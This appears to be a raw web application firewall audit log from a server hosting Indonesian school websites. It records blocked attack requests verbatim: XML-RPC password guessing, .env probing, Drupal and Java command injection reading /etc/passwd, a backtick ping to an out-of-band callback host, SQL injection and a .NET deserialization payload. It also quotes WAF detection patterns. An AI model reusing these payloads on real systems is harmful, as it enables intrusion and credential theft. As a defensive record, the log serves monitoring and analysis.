"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /apply_sec.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748297498841933 2695 (- - -) Stopwatch2: 1748297498841933 2695; combined=761, p1=526, p2=203, p3=0, p4=0, p5=32, sr=96, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b686532-Z-- --36358159-A-- [27/May/2025:05:16:36 +0700] aDToRN6cNBpj1JOkpQlKywAAAEg 103.236.140.4 48488 103.236.140.4 8181 --36358159-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1527 User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --36358159-C-- system.multicall methodName wp.getUsersBlogs params wakasarpras wakasarpras1234 --36358159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36358159-E-- --36358159-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748297796089503 7887 (- - -) Stopwatch2: 1748297796089503 7887; combined=5931, p1=514, p2=5248, p3=0, p4=0, p5=101, sr=92, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36358159-Z-- --e34b1b07-A-- [27/May/2025:05:20:18 +0700] aDTpIt6cNBpj1JOkpQlK0wAAAFI 103.236.140.4 48516 103.236.140.4 8181 --e34b1b07-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1526 User-Agent: DuckDuckBot/1.1; (+http://duckduckgo.com/duckduckbot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --e34b1b07-C-- system.multicall methodName wp.getUsersBlogs params wakasarpras wakasarpras123 --e34b1b07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e34b1b07-E-- --e34b1b07-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748298018070519 5178 (- - -) Stopwatch2: 1748298018070519 5178; combined=3650, p1=353, p2=3179, p3=0, p4=0, p5=69, sr=60, sw=49, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e34b1b07-Z-- --a01f4c43-A-- [27/May/2025:05:21:03 +0700] aDTpT1uSH_Spa4YU2ZmqIAAAAM4 103.236.140.4 48520 103.236.140.4 8181 --a01f4c43-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1527 User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --a01f4c43-C-- system.multicall methodName wp.getUsersBlogs params wakasarpras wakasarpras2022 --a01f4c43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a01f4c43-E-- --a01f4c43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (1+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748298063550356 7397 (- - -) Stopwatch2: 1748298063550356 7397; combined=5747, p1=450, p2=5086, p3=0, p4=0, p5=121, sr=89, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a01f4c43-Z-- --a8f5ef2f-A-- [27/May/2025:05:42:28 +0700] aDTuVN6cNBpj1JOkpQlK8gAAAE4 103.236.140.4 48626 103.236.140.4 8181 --a8f5ef2f-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 209.38.208.202 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 209.38.208.202 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a8f5ef2f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8f5ef2f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748299348091771 711 (- - -) Stopwatch2: 1748299348091771 711; combined=265, p1=228, p2=0, p3=0, p4=0, p5=37, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8f5ef2f-Z-- --2b62c612-A-- [27/May/2025:05:55:10 +0700] aDTxTt6cNBpj1JOkpQlLBwAAAFg 103.236.140.4 48704 103.236.140.4 8181 --2b62c612-B-- POST /account HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 100 User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 152791997 --2b62c612-C-- name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('cat%20%2Fetc%2Fpasswd')]=eiszm --2b62c612-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b62c612-E-- --2b62c612-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /account"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300110295267 1874 (- - -) Stopwatch2: 1748300110295267 1874; combined=511, p1=350, p2=131, p3=0, p4=0, p5=29, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b62c612-Z-- --0a2edf2f-A-- [27/May/2025:05:55:10 +0700] aDTxTt6cNBpj1JOkpQlLBQAAAFE 103.236.140.4 48688 103.236.140.4 8181 --0a2edf2f-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 70846054 --0a2edf2f-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --0a2edf2f-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a2edf2f-E-- --0a2edf2f-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748300110292937 5424 (- - -) Stopwatch2: 1748300110292937 5424; combined=3631, p1=421, p2=3133, p3=22, p4=29, p5=25, sr=68, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a2edf2f-Z-- --756d9232-A-- [27/May/2025:05:55:10 +0700] aDTxTt6cNBpj1JOkpQlLBAAAAFI 103.236.140.4 48686 103.236.140.4 8181 --756d9232-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168708058 --756d9232-C-- whatever-content --756d9232-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --756d9232-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748300110292877 5999 (- - -) Stopwatch2: 1748300110292877 5999; combined=4200, p1=587, p2=3539, p3=20, p4=22, p5=32, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --756d9232-Z-- --7b958b45-A-- [27/May/2025:05:55:10 +0700] aDTxTluSH_Spa4YU2ZmqMwAAANU 103.236.140.4 48700 103.236.140.4 8181 --7b958b45-B-- POST /xmlpserver/ReportTemplateService.xls HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 96 User-Agent: Mozilla/5.0 (Knoppix; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168868888 --7b958b45-C-- --7b958b45-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b958b45-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748300110294436 4654 (- - -) Stopwatch2: 1748300110294436 4654; combined=3227, p1=381, p2=2770, p3=22, p4=25, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b958b45-Z-- --8a50077f-A-- [27/May/2025:05:55:10 +0700] aDTxThLFq2VRfSzm6b8O3QAAAIM 103.236.140.4 48724 103.236.140.4 8181 --8a50077f-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0qa44pgpeoi1bmoheagfbhthd7m65bib.oast.live%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Mobile/15E148 Safari/604.1 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 166635708 --8a50077f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8a50077f-E-- --8a50077f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: `ping found within ARGS:ReaderNo: `ping d0qa44pgpeoi1bmoheagfbhthd7m65bib.oast.live`"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748300110310509 1582 (- - -) Stopwatch2: 1748300110310509 1582; combined=481, p1=322, p2=129, p3=0, p4=0, p5=29, sr=67, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a50077f-Z-- --0b909850-A-- [27/May/2025:05:55:10 +0700] aDTxTt6cNBpj1JOkpQlLCQAAAEA 103.236.140.4 48728 103.236.140.4 8181 --0b909850-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 166620317 --0b909850-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --0b909850-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b909850-E-- --0b909850-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300110310913 1879 (- - -) Stopwatch2: 1748300110310913 1879; combined=569, p1=356, p2=186, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b909850-Z-- --cbd04813-A-- [27/May/2025:05:55:10 +0700] aDTxThLFq2VRfSzm6b8O3gAAAIU 103.236.140.4 48724 103.236.140.4 8181 --cbd04813-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167871123 --cbd04813-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cbd04813-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748300110468524 2119 (- - -) Stopwatch2: 1748300110468524 2119; combined=920, p1=337, p2=551, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbd04813-Z-- --f24a642d-A-- [27/May/2025:05:55:10 +0700] aDTxTt6cNBpj1JOkpQlLCgAAAEI 103.236.140.4 48746 103.236.140.4 8181 --f24a642d-B-- POST /cgi-bin/supportInstaller HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 83 User-Agent: MSIE Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168868894 --f24a642d-C-- fromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0-- --f24a642d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f24a642d-E-- --f24a642d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0 found within MATCHED_VAR: unpossible' UNION SELECT 0,0,0,11132*379123,0,0,0,0"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: cgi-script Stopwatch: 1748300110469232 3007 (- - -) Stopwatch2: 1748300110469232 3007; combined=1665, p1=349, p2=1282, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f24a642d-Z-- --c075c15f-A-- [27/May/2025:05:55:10 +0700] aDTxTluSH_Spa4YU2ZmqNgAAAMI 103.236.140.4 48720 103.236.140.4 8181 --c075c15f-B-- POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 8004 User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 168708064 --c075c15f-C-- stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5